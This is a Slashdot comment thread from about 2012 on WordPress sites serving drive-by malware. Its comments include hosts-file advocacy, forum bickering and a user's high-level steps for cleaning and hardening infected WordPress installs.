hosts file can speed up access to his favorite websites by placing the ip address to domain-host name equation into them for his favorite sites avoiding possibly downed or compromised DNS servers (dns poisoning attacks and other known dns issues) as well as plusses for anonymity by the avoidance of DNS request logs or even dns block lists\dnsbls. Firewalls can't, and yet hosts can block out known bad host domains in them (which are the majority of what malware makers use versus ip addresses because domainnames are recyclable). Hosts offer that level of "defense in depth", but also speed gains (adbanner blocking most of all). I've read his posts on that here and elsewhere and apk's absolutely correct on that and has taken on naysayers here for years winning every time versus they. He illustrates both how hosts files are superior to DNS and adblock alone (both have big shortcomings, especially since adblock 'souled out' and doesn't block all ads anymore) and, how they compliment them as well as overcoming their shortcomings.

Why bother with an infector? (2)

Opportunist (166417) | more than 2 years ago | (#39275557)

Why bother using 0day exploits and payload droppers when the best infector is sitting right in front of the PC?

Re:Why bother with an infector? (3, Interesting)

DigiShaman (671371) | more than 2 years ago | (#39275883)

Agreed. The best form of hacking isn't technical, it's social. This is what happens when con artists turn to technology as another venue by which to exploit people.

Managed hosting infection (-1)

Anonymous Coward | more than 2 years ago | (#39275569)

A number of web sites hosted at Verisign got hit by this and a lot of them were randomly serving up malware. It took a while to identify and remove it.

Its 2012 and yet still... (-1, Troll)

Viol8 (599362) | more than 2 years ago | (#39275901)

... the Windows OS gets infected by a drive by web injection. How many more decades will MS continue to produce OS software thats this vulnerable? Yes I know the kernel user security is fine , but thats no use if the surrounding subsystems and apps just bypass it via administrator all the time.

Re:Its 2012 and yet still... (3, Informative)

X0563511 (793323) | more than 2 years ago | (#39276213)

Are you an idiot? The article is talking about WORDPRESS - a web application! Windows isn't involved!

Re:Its 2012 and yet still... (0)

Spy Handler (822350) | more than 2 years ago | (#39276511)

he's probably just auto-posting anti-MS fud and pro-Android/Google to build karma. Watch his comment become insightful soon.

Re:Its 2012 and yet still... (1)

NotBorg (829820) | more than 2 years ago | (#39276807)

You're right no one would ever want to involve Windows with their Wordpress install. The year of Windows on the server will never come.

So where does the malware get downloaded to idiot? (1)

Viol8 (599362) | more than 2 years ago | (#39285511)

Wordpress is the vector.

Fscking moron.

Re:So where does the malware get downloaded to idi (1)

X0563511 (793323) | more than 2 years ago | (#39288179)

So? The article is talking about the vector, not the payload.

Fscking moron.

Continued Password Problem (1)

Neutral_Observer (1409941) | more than 2 years ago | (#39275933)

Anyone else continuing to have a problem when you type your password that it shows instead of ******? My password is ilikegirrlz See, it did it again!

Re:Continued Password Problem (1)

Anonymous Coward | more than 2 years ago | (#39276037)

Hunter2
 
Now get off my lawn!

thhis FP for GNAA (-1)

Anonymous Coward | more than 2 years ago | (#39276183)

the lAs&t night of

Is there a Linux version? (0)

Anonymous Coward | more than 2 years ago | (#39276263)

IF so , where can I get it?

For Newbs: Steps to Fix (5, Informative)

dgrotto (2588895) | more than 2 years ago | (#39276675)

Most of my WP installs were infected because I am a slack ass. Here are the high level steps I took to solve the problem:

  • 1) Backup sites.
  • 2) Fix all world-writable directories in your WP install (what the hell WP?!). This seems to be the primary vector for getting in.
  • 3) Clean up infected PHP files with this script from php-beginners.com [php-beginners.com]. Thank you Paolo.
  • 4) Inspect all .htaccess configs for errant redirects and fix.
  • 5) Install and run the timthumb vulnerability scanner [wordpress.org]. Possible secondary vector. Thank you Peter Butler!
  • 6) Update your WP install to latest and greatest.
  • 7) Remove any unused plugins and themes.
  • 8) Backup sites.

I may be missing something - again, I'm a slackass. Anyone else have other advice for our admin-challenged friends besides "get a real software package"?

By the way, I was trying to lock down one of my WP installs to only allow authed users access to posts. However, WP does not put the assets for post - usually in wp-content/uploads - behind the auth wall. It's just out there for the whole world to see. It was a simple fix to rewrite the .htaccess config for this directory to redirect to an auth script, but still it still shocks me how insecure this app is.

Re:For Newbs: Steps to Fix (1)

dgrotto (2588895) | more than 2 years ago | (#39276749)

Forgot one thing:

The hack puts a list of sites to redirect to in a .logs directory. rm these.

Related drive-by malware (3, Informative)

ThatsNotPudding (1045640) | more than 2 years ago | (#39277193)

BTW: why is Adobe allowed to - by default - check the box on their flash updates to also install Norton on the victims computer? How many trusting civilians (think: grandmothers) end up with borked computers with conflicting AV programs solely due to corporate greed? I'm willing to bet this check box (if it even appears) is NOT checked by default in the EU market. Man, I miss government FOR the people...

Re:Related drive-by malware (0)

Anonymous Coward | more than 2 years ago | (#39280381)

You're absolutely right about that, and java can be just as bad with default installs of ask toolbar, carbonite backup trials, or whatever their flavor of the week is.

You're wrong however about "installing norton". That particular Norton gadget isn't going to conflict with an existing a/v scanner, it's just a checkup program.... .... which scans your computer, tells you about (somewhat legitimate) "threats" is has found, and offers to sell you Norton... ... which seems like a familiar tactic for some reason.

and I was looking for a blog site (1)

Skapare (16644) | more than 2 years ago | (#39278459)

And I was looking for a blog hoster this week, and specifically at WordPress. Anyone got a list of free blog hosters (moving away from blogspot)?

Which versions? (1)

sigaar (733777) | more than 2 years ago | (#39278461)

Any idea which versions of Wordpress is being targeted and/or which vulnerability? The quoted articles look more like commercials for Websense.

Wow, mass posting of idiotic clueless comments. (0)

Anonymous Coward | more than 2 years ago | (#39295021)

Blame this, blame that. Guess what, the problem is what you see in the mirror when you look in one. Learn your shit!

Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...